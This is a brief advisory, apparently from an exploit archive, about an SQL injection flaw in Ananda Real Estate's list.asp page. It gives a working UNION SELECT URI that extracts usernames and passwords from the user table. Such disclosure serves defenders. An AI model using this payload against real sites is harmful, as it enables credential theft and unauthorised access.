Ananda Real Estate List.ASP SQL Injection Vulnerability

Ananda Real Estate List.ASP SQL Injection Vulnerability

An attacker can exploit this issue via a web client.

The following example URI is available:

http://www.example.com/list.asp?agent=-1%20union%20select%20username,0,0,0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20user%20where%20id%20like%201[[/SQL]]